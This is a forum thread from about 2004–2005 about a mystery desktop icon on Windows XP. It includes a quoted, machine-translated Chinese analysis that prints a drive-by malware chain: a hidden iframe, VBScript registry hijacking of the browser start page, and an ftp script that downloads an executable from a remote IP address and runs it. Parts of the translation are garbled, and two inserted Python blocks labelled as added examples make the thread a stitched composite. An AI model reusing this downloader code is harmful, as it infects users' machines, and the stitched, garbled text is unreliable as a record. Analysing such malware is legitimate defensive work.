Odd icon appears on my desktop


Khadaji
12-30-2004, 08:50 AM
From time to time, an odd shortcut will appear on my desktop (Windows XP.) The caption will usually be unreadable, but will also often have the 1/4 symbol in it. I have copied the caption to word and checked various fonts and it always seems to be unprintable characters. I have looked at the properties and the shortcut and it does not appear to be linked to any program. I have thought that it may be a hacker attack, but I have a firewall and last night the shortcut showed up twice, but the firewall did not report any intruder attempts. Anyone have any ideas what this shortcut may be or where it is coming from?

Alvis
12-30-2004, 08:55 AM
Did you take a screenshot?

lno
12-30-2004, 08:56 AM
I have thought that it may be a hacker attack, but I have a firewall and last night the shortcut showed up twice, but the firewall did not report any intruder attempts.

If the firewall is already allowing someone access in a specific manner, it may not consider other instances as attacks.

Do you have a screenshot?

Khadaji
12-30-2004, 09:15 AM
No screen shot, but it will show up again in a few days, I'll grab a screen shot then.

Dewey Finn
12-30-2004, 09:45 AM
Since it's a shortcut, have you tried to right-click on it and look at Properties? What does it point to?

Alvis
12-30-2004, 09:51 AM
Since it's a shortcut, have you tried to right-click on it and look at Properties? What does it point to?

He already covered this -

I have looked at the properties and the shortcut and it does not appear to be linked to any program

Dewey Finn
12-30-2004, 09:52 AM
Sorry, must have read too quickly.

Khadaji
01-01-2005, 08:18 AM
So the icon appeared this morning. I have a screen capture of it, but nowhere to post it. The caption is 斣낼溧搆.

Jonathan Chance
01-01-2005, 08:28 AM
Email me the screenshot. I'll put it up on my webserver for you.

jasonh300
01-01-2005, 09:20 AM
斣낼溧搆.

I searched Google for this and it doesn't find anything, but the individual characters seem to come up with Japanese websites. It shows as Japanese characters here...you might not be seeing them as Japanese if you don't have the Japanese fonts installed. No telling what they mean because all of the results are in Japanese characters.

Khadaji
01-01-2005, 09:36 AM
Thanks Jonathan Chance, it is on its way.

Jonathan Chance
01-01-2005, 09:46 AM
OK, folks.

Observe:

http://www.wooleysark.com/OddShortCut.jpg

jasonh300
01-01-2005, 10:17 AM
Don't know about everybody else, but this is what I saw in the original post.

http://www.officeinkllc.com/japanese.jpg

Khadaji
01-01-2005, 11:12 AM
A new one has appeared. Its caption is 瘀漀爀椀琀攀 倀氀愀挀攀猀 唀瀀搀愀琀椀渀最⸀⸀⸀

Kythereia
01-01-2005, 01:22 PM
My first guess would be that you have some spyware or adware on your drive... have you done an anti-virus sweep of your computer?

jasonh300
01-01-2005, 01:27 PM
The first part of it came up in Google. It offered to translate it from 'simple Chinese' but it didn't work.

This was the result before the translation. Maybe somebody can read Chinese? (http://www.google.com/search?num=100&hl=en&lr=lang_en&newwindow=1&safe=off&q=%E7%98%80%E6%BC%80%E7%88%80%E6%A4%80%E7%90%80%E6%94%80&btnG=Search)

Khadaji
01-01-2005, 03:50 PM
My first guess would be that you have some spyware or adware on your drive... have you done an anti-virus sweep of your computer?
I have McAfee and it runs regularly. I have Adaware and it is run regularly. I went to my firewall site and asked it to run its scan for trojans and it reported nothing.

Scruloose
01-01-2005, 04:45 PM
Running these through an online translator, I get the following:

斣낼溧搆 = ? It will put out? ? $$ln


That was returned for Korean.

The second one (Chinese - Simplified)


瘀漀爀椀琀攀 倀氀愀挀攀猀 唀瀀搀愀琀椀渀最 = The stasis □□□□climbs □□□changes countenance □climbs
□□□□supports by the arm changes countenance □□□

From here: http://www.worldlingo.com/wl/translate

Yeah, I'd be carpet bombing my computer with anti-scumware munitions.
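Before feeding a caption like this to a Chinese, Japanese or Korean translator, it is worth checking whether it is text at all. Every character of the second caption has a Unicode code point whose low byte is zero and whose high byte is a printable ASCII letter, which is exactly what ASCII text encoded as UTF-16 looks like when the two bytes of each character are read in the wrong order. The following is an added example (not from this thread) in Python that applies that check to both captions quoted above; the captions are copied from the posts, the function names are mine.

```python
# Added example: test whether a "garbled" desktop caption is really UTF-16 text
# whose two bytes per character were read in the wrong order (byte-swapped).

# Second caption from the thread, written as escapes so the file encoding cannot
# alter it. Visible form on the page: 瘀漀爀椀琀攀 倀氀愀挀攀猀 唀瀀搀愀琀椀渀最⸀⸀⸀
SECOND_CAPTION = ("\u7600\u6f00\u7200\u6900\u7400\u6500 "
                  "\u5000\u6c00\u6100\u6300\u6500\u7300 "
                  "\u5500\u7000\u6400\u6100\u7400\u6900\u6e00\u6700"
                  "\u2e00\u2e00\u2e00")

# First caption from the thread, copied as posted.
FIRST_CAPTION = "斣낼溧搆"


def unswap_utf16(text):
    """Swap the two bytes of every 16-bit code unit and return the result if
    every unit then becomes printable ASCII; otherwise return None.

    Plain ASCII characters (for example separator spaces that survived
    copy-and-paste intact) are passed through unchanged."""
    out = []
    for ch in text:
        cp = ord(ch)
        if cp < 0x80:
            out.append(ch)
            continue
        low, high = cp & 0xFF, cp >> 8
        # A swapped ASCII character has a zero low byte and a printable high byte.
        if low != 0 or not 0x20 <= high < 0x7F:
            return None
        out.append(chr(high))
    return "".join(out)


def swap_utf16(text):
    """The inverse operation: encode ASCII text as UTF-16LE and read the same
    bytes back as UTF-16BE. This is how a label such as 'Updating...' turns
    into a caption of CJK-looking characters."""
    return text.encode("utf-16-le").decode("utf-16-be")


if __name__ == "__main__":
    for caption in (FIRST_CAPTION, SECOND_CAPTION):
        print(repr(caption), "->", repr(unswap_utf16(caption)))
```

The second caption comes back as "vorite Places Updating...", the tail of an ordinary English label; the first caption fails the check (its low bytes are non-zero) and is therefore not a byte-swapped ASCII string, so the test tells the two cases apart rather than forcing an interpretation onto both.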

Scruloose
01-01-2005, 04:57 PM
Here's another free online translator I found, in case anyone's interested:

http://www.appliedlanguage.com/free_translation.shtml

Futile Gesture
01-01-2005, 06:15 PM
Doesn't look like a shortcut to me. It looks more like something is using your desktop directory to create temporary files.

This would appear as a mysterious and disappearing file on your desktop.

I'd investigate what is pointing at your desktop directory in your registry and see what your temp directories are set to.

Khadaji
01-01-2005, 07:19 PM
Both Norton and McAfee report no viruses or trojans. Both are up to date.

Futile Gesture, that is an interesting idea. I'll see what I can find.

Mr. Blue Sky
01-01-2005, 07:23 PM
You say your firewall shows no intruder activity. How about outgoing activity?

I use Zone Alarm and it keeps a log of every program that attempts to connect to the 'net, even if I've told it to not allow it.

Sample_the_Dog
01-01-2005, 07:49 PM
I had a keylogger on my machine for who knows how long, which McAfee and AdAware did not catch. Keeping up with malware is a kind of arms race.

Currently, I use a combination of Ghost Surf Platinum (which did find the keylogger), HijackThis, Spybot, McAfee anti-virus and firewall, and Ad-Aware. They each catch things the others miss.

It's no longer just questionable sites getting hacked these days. Earlier this year, some major sites, including CitiBank, were compromised by hackers installing keyloggers (probably where I picked up mine).

These days, it's worth it to go pro, imho. All my traffic is encrypted now.

Sample_the_Dog
01-01-2005, 07:51 PM
I forgot to add, CWShredder is a must if you suspect you may have CoolWebSearch (aka CoolWWWSearch) on your machine. It's particularly nasty. Symptoms include popups and redirection.

DarrenS
01-01-2005, 09:49 PM
Another thing to try is open the file in a hex editor. This is not for the faint of heart, but a freeware one is available here (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm). Then, open the file from where it lives on disk - probably something like C:\Documents and Settings\<your user name>\desktop\<the filename>

If it's really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what's in it.

DarrenS
01-01-2005, 10:12 PM
On reflection, from the screenshot it doesn't look like a shortcut since it lacks the little arrow (though this can be turned off by the user with things like TweakUI.) Still would be interesting to see what's in the file - please paste it here.

Khadaji
01-02-2005, 08:05 AM
Another thing to try is open the file in a hex editor. This is not for the faint of heart, but a freeware one is available here (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm). Then, open the file from where it lives on disk - probably something like C:\Documents and Settings\<your user name>\desktop\<the filename>

If it's really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what's in it.
I have a hex editor (I'm a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.

And you and Kythereia are right, it does not seem to be a shortcut.

Scruloose
01-02-2005, 08:41 AM
The first part of it came up in Google. It offered to translate it from 'simple Chinese' but it didn't work.

This was the result before the translation. Maybe somebody can read Chinese? (http://www.google.com/search?num=100&hl=en&lr=lang_en&newwindow=1&safe=off&q=%E7%98%80%E6%BC%80%E7%88%80%E6%A4%80%E7%90%80%E6%94%80&btnG=Search)

Here's an online translation of the page (a message board post):
Publication: 2004-10-31 15:02:53 human spirits:44 [This user main page] [Quotation reply] [Sends the news to sbyking] Lou Zhu

[ 原创 ] traces the QQ virus once more! (2004.10.31)

SbykingIn 2004-03-17 21:06:08 has written named [ 原创 ] QQ tail track! ! !The card, the address is
Http://www.Yoyou.Net/bbs/Announce/Announce.Asp?BoardID=42&ID=18610
Today accesses the net also has net friend's QQ to send in such news:

(2004-10-31 13:49:56) God's favored one
Sbyking, I 听歌.
This DJ music website real 好棒! You like the DJ music?
I like the DJ music very much. Thinks very the person or household who refuses to move and bargains for unreasonably high compensation when the land is requisitioned for a construction project.
You also listen! Hxxp://www.21ccn.Com/

The stand from under website cannot open directly in the address fence, wants to be poisoned you were casual! ! !

In here you must want above to look the website source code does not open its homepage?SbykingThe method is opens my individual homepage (sbyking to state here is not absolutely in creates propaganda for own rotten website, you if thought like this speech, I but treat unjustly)Http://spyking.8u8.Com/online/ found in this page
"Inputs the website in under to examine the source document" a such line in "above examined" front inputs the website, certainly must bring http:// oh, then clicks "examines", waited for one can be able to open a memorandum. This was this website source code, specifically as follows:

1.

<HTML>
<HEAD>
<TITLE> The handset ting picture, the color letter main terminal I love short note net sms521.Com</TITLE>
</HEAD>
<Iframe src=qq06.Htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
// sbyking annotation here is the malicious code page! ! !
<Body onunload="t8 ()">
<Script Language="javascript">
<!--
Var exit=true;
Function t8 ()
{
If (exit)
Window.Open ('Http://www.Yi76.Com')
}
// -->

</script>
<Center><Iframe src=http://mms.Homeway.Com.Cn/newsite/index.Asp?Smsid=12190 width=800 height=1900 frameborder=0 scrolling=NO></iframe></center>

</body>
</HTML>


2. Then continues with the above method to examine qq06.Htm source code as follows:

<Object data=qq06i.Test></object>
<Object data=qq06.Test></object>


3. Then continues with the above method to examine qq06i.Test source code as follows:

<Html>
<Object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<Script LANGUAGE="VBScript">
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\First Home Page", "Http://21ccn.Com";
wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1, "REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
window.Close
</script>

<Script LANGUAGE="VBScript">
on error resume next
□□Call LongFei_AddFavorites ("[ brand-new MP3 not □□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□□□□□□X □□□□□□□□□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □climbs □Q □fat H □N □X □□□□□to ferment □x □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□
□□N □` □climbs □e □e □N □e □□e to climb □Q □I □□to climb □□` to climb 砀 □H □
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □x □I □□□□□□□changes countenance □I □` □□栀 □□mosquito larvae □□e □□□□□□□□□□□□~ □□□栀 □H □H □X □□□□b □b □b □□□□□□□□` □□□□N □□□□□
□□changes countenance □□□□□□□N □` most □to climb □mourns □□supports by the arm □changes countenance stasis □N □e □to fear H to climb □Q □□□□V □□□? □□] ","Http://www.Yi76.Com";)

Function LongFei_AddFavorites (N, U)
on error resume next
Set S = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/" + N + ".URL")
S.TargetPath = U
S.Save ()
Set Sl = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/link/" + N + ".URL")
Sl.TargetPath = U
Sl.Save ()
End Function

Function LongFei_AddDesktop (N, U)
on error resume next
Set S = wsh.CreateShortcut (wsh.SpecialFolders ("AllUsersDesktop") + "/" + N + ".URL")
S.TargetPath = U
S.Save ()
End Function

</script>
<Script language="JScript.Encode">
function closeit () {
setTimeout ("self.Close ()",5)
}
closeit ()
</script>


</html>

4. Then continues with the above method to examine qq06.Test source code as follows:


<Html>
<Object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<Script LANGUAGE="VBScript">
Dim fso, tf, wsh
Set fso = CreateObject ("Scripting.FileSystemObject")
Set wsh=createobject ("wscript.Shell")
Set tf = fso.CreateTextFile ("ftp.Txt ", true)
Tf.Write "open 218.6.169.139 "&chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "get 21ccn.Exe "&chr (13) &chr (10)
Tf.Write "bye"
Tf.Close
A=wsh.Run ("ftp -s:Ftp.Txt ",0, true)
B=wsh.Run ("21ccn.Exe")
Window.Close
</script>
<Script language="javascript">
Function closeit () {
SetTimeout ("self.Close ()",5)
}
Closeit ()
</script>
</html>

Subtotal: On saw like this to the website source code, own could not be poisoned! ! ! Actually this certainly does not have what profound technology, only is a small skill! ! Sbyking shares with everybody ~ ~ ~ ~ ~ ~ ~

Well, I know that I like the DJ music. Anyway...

Make of that what you will. The highlighted area of red is where 瘀漀爀椀琀攀 was found twice.
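The four pages quoted in that post form a chain with a handful of recognisable traits: a zero-size iframe pulls in a second page, that page is nothing but <object data=...> elements, and the pages they load instantiate WScript.Shell through its CLSID from VBScript, rewrite the Internet Explorer start-page registry keys, and drive ftp.exe with a script file. As an added example (not from this thread or from the quoted post), here is a small rule-based scanner in Python that flags those traits in saved HTML. The sample pages are constructed stand-ins modelled on the quoted ones with placeholder hostnames, and the rule names are my own; a real scanner would parse the HTML rather than rely on regular expressions, but the rules show what to look for.

```python
# Added example: flag the traits of the hijacker page chain quoted above in
# saved HTML. Regex-based on purpose so it runs anywhere; not a full parser.
import re

# CLSID of the WScript.Shell ActiveX object, as it appears in the quoted pages.
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"

# (rule name, pattern) in the order findings are reported.
RULES = [
    # An iframe with width=0 or height=0 exists only to load something unseen.
    ("hidden_iframe",
     re.compile(r"<iframe[^>]*\b(width|height)\s*=\s*['\"]?0\b[^>]*>", re.I)),
    # <object classid=clsid:F935DC22-...> gives script a WScript.Shell instance.
    ("wscript_shell_object",
     re.compile(r"<object[^>]*classid\s*=\s*['\"]?clsid:" + WSCRIPT_SHELL_CLSID, re.I)),
    # RegWrite against the IE Main key: start/search page hijacking.
    ("ie_start_page_regwrite",
     re.compile(r"RegWrite\s+\"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\", re.I)),
    # Shell.Run of ftp: a script-driven download of a second-stage executable.
    ("shell_run_ftp",
     re.compile(r"\.Run\s*\(\s*\"ftp\b", re.I)),
    # A page whose content is <object data=...> loading further local files.
    ("object_data_chain",
     re.compile(r"<object[^>]*\bdata\s*=", re.I)),
]


def scan_html(html):
    """Return the names of all rules that match the page, in RULES order."""
    return [name for name, pattern in RULES if pattern.search(html)]


def scan_pages(pages):
    """Scan a {name: html} mapping and return only the pages with findings."""
    results = {}
    for name, html in pages.items():
        findings = scan_html(html)
        if findings:
            results[name] = findings
    return results


# Constructed samples modelled on the four quoted stages (placeholder hosts).
STAGE1 = """<HTML><HEAD><TITLE>sample landing page</TITLE></HEAD>
<Iframe src=stage2.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
<Body>visible content</Body></HTML>"""

STAGE2 = "<Object data=stage3.test></object>\n<Object data=stage4.test></object>"

STAGE3 = r"""<Html>
<Object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<Script LANGUAGE="VBScript">
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://hijack.example"
</script></html>"""

STAGE4 = r"""<Html>
<Object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<Script LANGUAGE="VBScript">
A=wsh.Run("ftp -s:ftp.txt",0,true)
</script></html>"""

# A constructed benign page: a normally sized embedded player, no script.
BENIGN = ('<html><body><iframe src="https://player.example/embed" '
          'width="640" height="360"></iframe></body></html>')

SAMPLES = {"stage1": STAGE1, "stage2": STAGE2, "stage3": STAGE3,
           "stage4": STAGE4, "benign": BENIGN}

if __name__ == "__main__":
    for name, findings in scan_pages(SAMPLES).items():
        print(name, "->", ", ".join(findings))
```

On the constructed samples the benign page produces no findings while each stage of the chain trips at least one rule; in practice the interesting signal is several of these rules firing across files fetched within seconds of one another.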

LSLGuy
01-02-2005, 08:57 AM
Do the contents of the "file" seem familiar? I'm suspecting that something is creating a file entry in the volume MFT and allocating space, but not writing anything. So you're seeing whatever junk was leftover from the prior use of that particular cluster(s).

An alternative is a slightly fouled up MFT (assuming an NTFS formatted volume). Spurious index entries aren't unheard of. If you're on a FAT32 volume, well the odds are even higher this is the source of the problem.

I'd recommend a full backup followed by using the repair & defrag tools. You can also run chkdsk from the command line without the /f parameter to see if you have problems. That won't fix anything, but it'll at least tell you whether I'm barking up the right tree and whether you need to go to the hassle of a full backup & repair then defrag.

Khadaji
01-03-2005, 01:03 PM
I have a hex editor (I'm a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.
A co-worker mentioned that Hex Editor was refusing to open this due to the bad characters in the caption. His suggestion is to rename the file and try to open it. I'm not at home, but will try this tonight.


Copyright 2018 STM Reader, LLC.